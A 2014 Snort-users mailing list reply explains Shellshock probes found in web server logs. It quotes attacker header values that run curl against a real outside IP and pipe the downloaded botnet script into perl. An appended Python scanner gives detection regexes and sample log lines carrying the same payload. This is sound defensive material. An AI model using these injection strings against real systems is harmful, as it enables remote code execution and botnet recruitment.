[Snort-users] Odd http requests in the logs

waldo kitty wkitty42 at ...14940...
Mon Nov 3 14:15:21 EST 2014


On 11/2/2014 11:23 PM, Richard Geddes wrote:
> Hello,
>
> I received a few (9) events in my web logs with the following fields:
>
> agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png |
> perl"
>
> referrer : "() { :; }; curl
> http://202.28.77.53/~prajaks/310482/index.png | perl"

these are shellshock attempts... they are trying to use a macro hole in the bash 
command interpreter...

> downloaded index.png, and it turns out to be a base64 encoded perl
> script that has comments about a botnet.  It seems to target apache.

yes, that script is a "2nd phase" that's only operational if the shellshock 
bypass attempt works... it also requires curl and perl to be installed and 
operational... curl for the retrieval and perl for the botnet script execution...

> I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense,
> snort, and the snort rules are up-to-date

do you have the shellshock detection rules enabled?

> snort seems to be passing these requests on to my web server, and it
> seems to me they should be blocked.

does the pfsense installation of snort operate as IDS (intrusion detection 
system) or IPS (intrusion protection system)?

in either case, if the rules are not enabled to detect this problem, snort won't 
react to traffic that matches...

> I don't know enough about how web servers and log handlers process this
> data to determine if it's a threat.

the way it works is if those fields are processed by a bash CLI session... they 
create a macro that bash doesn't properly handle and it executes the commands 
after the semi-colon ";"... that's the bug... bash should stop processing the 
macro when it sees the semi-colon... if you are running a *nix OS, you should 
have already gotten several security updates fixing this problem...

> Is there a way to tell snort to block http requests with these fields?
> The source of the malicious file should probably be regex'd in case
> there are alternate sources of this file.

blocking depends on your installation and its capabilities...

-- 
  NOTE: No off-list assistance is given without prior approval.
        Please *keep mailing list traffic on the list* unless
        private contact is specifically requested and granted.
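As an added example, not part of the thread or of Snort itself, here is a small Python check of the kind that could be run over the web server's own logs: it parses Apache combined-format lines, flags the `() {` function prologue in the Referer and User-Agent fields, and marks entries that also pipe a download into an interpreter (the "2nd phase" described in the reply). The log lines are constructed and use a placeholder host; the field names and regexes are this example's own assumptions.

```python
import re

# Constructed sample log lines in Apache combined format (not taken from the thread).
# The download host is a placeholder; the header values mimic the reported requests.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Nov/2014:23:10:01 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Nov/2014:23:11:45 -0500] "GET /cgi-bin/status HTTP/1.1" 200 77 "() { :; }; curl http://example.invalid/index.png | perl" "() { :; }; curl http://example.invalid/index.png | perl"
203.0.113.10 - - [02/Nov/2014:23:12:03 -0500] "GET /index.html HTTP/1.1" 200 1024 "http://example.com/" "() {:;}; /bin/sleep 5"
"""

# Apache "combined" log format: the last two quoted fields are Referer and User-Agent.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock marker: the bash function-definition prologue "() {" appearing in a
# header value, with optional whitespace between the parentheses and the brace.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Second-phase marker: a downloader whose output is piped straight into an interpreter.
FETCH_EXEC_RE = re.compile(r'\b(curl|wget)\b.*\|\s*(perl|sh|bash|python)\b')


def find_shellshock(log_text):
    """Return one hit per header field that carries the shellshock prologue.

    Each hit records the client IP, which header it was in, the raw value, and
    whether the value also chains a download into an interpreter.
    """
    hits = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for field in ("referer", "agent"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                hits.append({
                    "ip": m.group("ip"),
                    "field": field,
                    "value": value,
                    "fetch_and_exec": bool(FETCH_EXEC_RE.search(value)),
                })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit["ip"], hit["field"], "second-phase" if hit["fetch_and_exec"] else "probe-only")
```

A line with the prologue but no download-and-execute chain (the third sample) is still an attempt and worth alerting on; the absence of the second phase only means the host was not asked to fetch a payload.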
